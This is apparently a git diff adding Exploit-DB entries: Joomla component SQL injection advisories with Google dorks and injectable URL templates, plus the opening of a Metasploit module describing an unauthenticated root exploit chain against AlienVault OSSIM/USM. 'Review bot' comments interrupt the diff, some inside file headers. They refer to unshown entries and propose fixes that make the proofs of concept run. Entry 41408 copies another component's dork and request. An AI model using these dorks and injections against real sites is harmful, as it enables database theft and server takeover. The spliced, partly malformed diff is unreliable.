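Review bot: The reproduction URL in the 41423 entry names `yvplane.flv` while the file the reader is told to host is `yuvplane.flv`, so the instructions as written request a file that does not exist; the URL should read `127.0.0.1/LoadMP4.swf?file=yuvplane.flv`. It would also help to say that `LoadMP4.swf` ships in the linked archive, since the 41420 entry only refers to "the attached files".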
diff --git a/platforms/php/webapps/41405.txt b/platforms/php/webapps/41405.txt
new file mode 100755
index 000000000..06b28f191
--- /dev/null
+++ b/platforms/php/webapps/41405.txt
@@ -0,0 +1,18 @@
+# # # # #
+# Exploit Title: Joomla! Component J-HotelPortal v6.0.2 - SQL Injection
+# Google Dork: inurl:index.php?option=com_jhotelreservation
+# Date: 21.02.2017
+# Vendor Homepage: http://www.cmsjunkie.com/
+# Software Buy: http://www.cmsjunkie.com/joomla-hotel-portal
+# Demo: http://hoteldemo.cmsjunkie.com/j3/portal/
+# Version: 6.0.2
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_jhotelreservation&tmpl=component&task=hotelratings.printRating&view=hotelratings&review_id=[SQL]
+# Etc...
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41406.txt b/platforms/php/webapps/41406.txt
new file mode 100755
index 000000000..b9790dd04
--- /dev/null
+++ b/platforms/php/webapps/41406.txt
@@ -0,0 +1,18 @@
+# # # # #
+# Exploit Title: Joomla! Component J-CruiseReservation Standard v3.0 - SQL Injection
+# Google Dork: inurl:index.php?option=com_jcruisereservation
+# Date: 21.02.2017
+# Vendor Homepage: http://www.cmsjunkie.com/
+# Software Buy: http://www.cmsjunkie.com/ajax/index/options/product_id/58/
+# Demo: http://demo.cmsjunkie.com/cruise/
+# Version: 3.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/cruises/cruises?city=[SQL]
+# Etc...
+# # # # #
diff --git a/platforms/php/webapps/41407.txt b/platforms/php/webapps/41407.txt
new file mode 100755
index 000000000..4a9bae1f4
--- /dev/null
+++ b/platforms/php/webapps/41407.txt
@@ -0,0 +1,19 @@
+# # # # #
+# Exploit Title: Joomla! Component Eventix Events Calendar v1.0 - SQL Injection
+# Google Dork: inurl:index.php?option=com_eventix
+# Date: 21.02.2017
+# Vendor Homepage: http://informafix.fr/
+# Software Buy: https://extensions.joomla.org/extensions/extension/calendars-a-events/events/eventix-events-calendar/
+# Demo: http://demo.informafix.fr/index.php?option=com_eventix
+# Version: 1.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_eventix&view=eventsday&selected_date=2017-02-16&day=[SQL]
+# http://localhost/[PATH]/index.php?option=com_eventix&view=eventsday&selected_date=[SQL]
+# http://localhost/[PATH]/index.php?option=com_eventix&view=eventssearch&=[SQL]
+# # # # #
diff --git a/platforms/php/webapps/41408.txt b/platforms/php/webapps/41408.txt
new file mode 100755
index 000000000..b1d4e97a2
--- /dev/null
+++ b/platforms/php/webapps/41408.txt
@@ -0,0 +1,18 @@
+# # # # #
+# Exploit Title: Joomla! Component J-MultipleHotelReservation Standard v6.0.2 - SQL Injection
+# Google Dork: inurl:index.php?option=com_jcruisereservation
+# Date: 21.02.2017
+# Vendor Homepage: http://www.cmsjunkie.com/
+# Software Buy: http://www.cmsjunkie.com/joomla_multi_hotel_reservation_standard
+# Demo: http://hoteldemo.cmsjunkie.com/j3/multiple_standard/
+# Version: 6.0.2
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_jhotelreservation&tmpl=component&task=hotelratings.printRating&view=hotelratings&review_id=[SQL]
+# Etc...
+# # # # #
diff --git a/platforms/php/webapps/41409.txt b/platforms/php/webapps/41409.txt
new file mode 100755
index 000000000..6bb032017
--- /dev/null
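Review bot: The third request in the 41407 entry, `view=eventssearch&=[SQL]`, has an empty parameter name, so the injectable parameter has evidently been dropped and a reader cannot reproduce it; restore the name (the advisory carries no payload or error output from which it could be recovered). A sample payload or observed response for at least one of the three parameters would make the finding verifiable.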
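Review bot: The 41408 entry's dork (`inurl:index.php?option=com_jcruisereservation`) and its only request (`option=com_jhotelreservation…review_id=[SQL]`) are copied verbatim from the 41406 and 41405 entries and reference neither the J-MultipleHotelReservation component nor its demo path named in the header. If the multiple-hotel product shares the `com_jhotelreservation` code path that should be stated explicitly; otherwise the dork and request need to be replaced with ones for the component actually being reported.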
+++ b/platforms/php/webapps/41409.txt
@@ -0,0 +1,17 @@
+# # # # #
+# Exploit Title: Joomla! Component Directorix Directory Manager v1.1.1 - SQL Injection
+# Google Dork: inurl:index.php?option=com_directorix
+# Date: 21.02.2017
+# Vendor Homepage: http://informafix.fr/
+# Software Buy: https://extensions.joomla.org/extensions/extension/directory-a-documentation/address-book/directorix-directory-manager/
+# Demo: http://demo.informafix.fr/index.php?option=com_directorix
+# Version: 1.1.1
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_directorix&view=entriessearch&search_categories[]=[SQL]
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41410.txt b/platforms/php/webapps/41410.txt
new file mode 100755
index 000000000..457ff744a
--- /dev/null
+++ b/platforms/php/webapps/41410.txt
@@ -0,0 +1,19 @@
+# # # # #
+# Exploit Title: Joomla! Component Magic Deals Web v1.2.0 - SQL Injection
+# Google Dork: inurl:index.php?option=com_magicdealsweb
+# Date: 21.02.2017
+# Vendor Homepage: http://jasonwebdesign.com/
+# Software Buy: https://extensions.joomla.org/extensions/extension/e-commerce/gifts-a-coupons/magic-deals-web/
+# Demo: http://magicdealsweb.jasonwebdesign.com/
+# Version: 1.2.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?filterbycats=all&fullordering=[SQL]&option=com_magicdealsweb&task=dealswebindex&view=dealswebindex
+# http://localhost/[PATH]/index.php?filterbycats=[SQL]=final_price+DESC&option=com_magicdealsweb&task=dealswebindex&view=dealswebindex
+# http://localhost/[PATH]/index.php/component/magicdealsweb/?option=com_magicdealsweb&view=search&search_in=11&q=[SQL]
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41411.txt
new file mode 100755
index 000000000..69ffde96c
--- /dev/null
+++ b/platforms/php/webapps/41411.txt
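Review bot: The second PoC URL reads `filterbycats=[SQL]=final_price+DESC&option=...`, which leaves `final_price+DESC` without a parameter name and makes the query string malformed. Comparing it with the first URL, where `fullordering` is the ordering parameter, the `&fullordering` separator appears to have been lost, so the line should presumably be `# http://localhost/[PATH]/index.php?filterbycats=[SQL]&fullordering=final_price+DESC&option=com_magicdealsweb&task=dealswebindex&view=dealswebindex`. As with the sibling advisories, a line stating the injection type and whether authentication is required would let a reader verify the three injection points rather than guess.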
@@ -0,0 +1,19 @@
+# # # # #
+# Exploit Title: Joomla! Component J-BusinessDirectory v4.6.8 - SQL Injection
+# Google Dork: inurl:index.php?option=com_jbusinessdirectory
+# Date: 21.02.2017
+# Vendor Homepage: http://www.cmsjunkie.com/
+# Software Buy: http://www.cmsjunkie.com/ajax/index/options/product_id/73/
+# Demo: http://demo.cmsjunkie.com/j-businessdirectory/
+# Version: 4.6.8
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_jbusinessdirectory&view=companies&companyId=[SQL]
+# http://localhost/[PATH]/index.php?option=com_jbusinessdirectory&view=search&searchkeyword=1&categoryId=[SQL]
+# Etc...
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41412.txt
new file mode 100755
index 000000000..3916973e7
--- /dev/null
+++ b/platforms/php/webapps/41412.txt
@@ -0,0 +1,18 @@
+# # # # #
+# Exploit Title: Joomla! Component AppointmentBookingPro v4.0.1 - SQL Injection
+# Google Dork: inurl:index.php?option=com_rsappt_pro3
+# Date: 21.02.2017
+# Vendor Homepage: http://appointmentbookingpro.com/
+# Software Buy: https://extensions.joomla.org/extensions/extension/vertical-markets/booking-a-reservations/appointmentbookingpro/
+# Demo: http://demo.appointmentbookingpro.com/
+# Version: 4.0.1 / 4.0.2
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/component/rsappt_pro3/booking_screen_gad/891/show_confirmation/ff09f352c87f96e505706df0cfa3e8cc/999[SQL]
+# http://localhost/[PATH]/index.php?option=com_rsappt_pro3&view=resourceslist&tags=[SQL]
+# # # # #
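Review bot: The `# Version:` line says `4.0.1 / 4.0.2` while the Exploit Title names only `v4.0.1`; if 4.0.2 was also confirmed vulnerable the title should say `v4.0.1 / 4.0.2`, otherwise the version line should be narrowed so the two agree. The first PoC URL embeds values that look specific to the demo instance (`booking_screen_gad/891/show_confirmation/ff09f352c87f96e505706df0cfa3e8cc/999[SQL]`); a reader needs to know that the `891` id and the 32-character hex token must be replaced with values valid on the target, presumably obtained from an earlier step of the booking flow, which the advisory does not describe. A comment such as `# 891 and the hash are instance-specific; take them from a booking confirmation on the target` placed above that URL would avoid a false negative when the PoC is run as-is.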
diff --git a/platforms/php/webapps/41424.rb
new file mode 100755
index 000000000..58790df1a
--- /dev/null
+++ b/platforms/php/webapps/41424.rb
@@ -0,0 +1,322 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::Remote::SSH
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => "AlienVault OSSIM/USM Remote Code Execution",
+ 'Description' => %q{
+ This module exploits object injection, authentication bypass and ip spoofing vulnerabities all together.
+ Unauthenticated users can execute arbitrary commands under the context of the root user.
+
+ By abusing authentication bypass issue on gauge.php lead adversaries to exploit object injection vulnerability
+ which leads to SQL injection attack that leaks an administrator session token. Attackers can create a rogue
+ action and policy that enables to execute operating system commands by using captured session token. As a final step,
+ SSH login attempt with a invalid credentials can trigger a created rogue policy which triggers an action that executes
+ operating system command with root user privileges.
+
+ This module was tested against following product and versions:
+ AlienVault USM 5.3.0, 5.2.5, 5.0.0, 4.15.11, 4.5.0
+ AlienVault OSSIM 5.0.0, 4.6.1
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Peter Lapp', # EDB advisory owner
+ 'Mehmet Ince